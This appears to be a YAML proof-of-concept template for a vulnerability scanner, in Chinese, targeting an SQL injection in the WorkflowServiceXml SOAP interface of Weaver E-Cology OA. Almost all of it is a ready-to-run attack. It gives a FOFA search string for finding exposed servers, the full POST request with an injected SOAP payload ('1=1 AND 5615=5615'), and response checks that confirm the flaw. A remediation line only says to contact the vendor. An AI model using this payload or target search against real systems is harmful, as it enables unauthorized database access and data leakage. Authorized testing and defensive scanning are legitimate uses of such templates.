product: 泛微 E-Cology
vName: 泛微E-Cology WorkflowServiceXml接口存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微OA E Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞，可获取数据库权限，导致数据泄露。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://blog.csdn.net/qq_37602797/article/details/116902793
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      header:
        Content-Type: text/xml
      path: /services/WorkflowServiceXml
      data: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1 AND 5615=5615</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body></soapenv:Envelope>'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - soap:Envelope xmlns:soap=
              - WorkflowRequestInfo
            logic: 'and'